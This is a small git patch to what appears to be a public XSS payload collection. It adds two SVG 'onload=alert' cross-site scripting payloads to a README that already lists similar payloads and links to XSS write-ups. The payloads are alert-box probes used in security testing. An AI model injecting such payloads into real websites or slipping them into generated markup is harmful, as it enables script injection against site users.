From 5a24060b6e6464328f986010aef3da6dbf5046e5 Mon Sep 17 00:00:00 2001
From: whoami <137591244+awhoami@users.noreply.github.com>
Date: Thu, 16 Jan 2025 22:40:53 +0100
Subject: [PATCH] Update README(Svg payload).md

Additional Svg payload
---
 XSS Injection/README.md | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index ea9cbcd..d37f93b 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -204,6 +204,8 @@ Most tools are also suitable for blind XSS attacks:
 <svg onload=alert(1)//
 <svg/onload=alert(String.fromCharCode(88,83,83))>
 <svg id=alert(1) onload=eval(id)>
+"><svg onload=alert(1)>
+"><svg onload=alert('XSS')>
 "><svg/onload=alert(String.fromCharCode(88,83,83))>
 "><svg/onload=alert(/XSS/)
 <svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)
@@ -616,4 +618,4 @@ Technical blogposts available at
 - [XSS via Host header - www.google.com/cse - Michał Bentkowski - April 22, 2015](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html)
 - [Xssing Web With Unicodes - Rakesh Mane - August 3, 2017](http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html)
 - [Yahoo Mail stored XSS - Jouko Pynnönen - January 19, 2016](https://klikki.fi/adv/yahoo.html)
-- [Yahoo Mail stored XSS #2 - Jouko Pynnönen - December 8, 2016](https://klikki.fi/adv/yahoo2.html)
\ No newline at end of file
+- [Yahoo Mail stored XSS #2 - Jouko Pynnönen - December 8, 2016](https://klikki.fi/adv/yahoo2.html)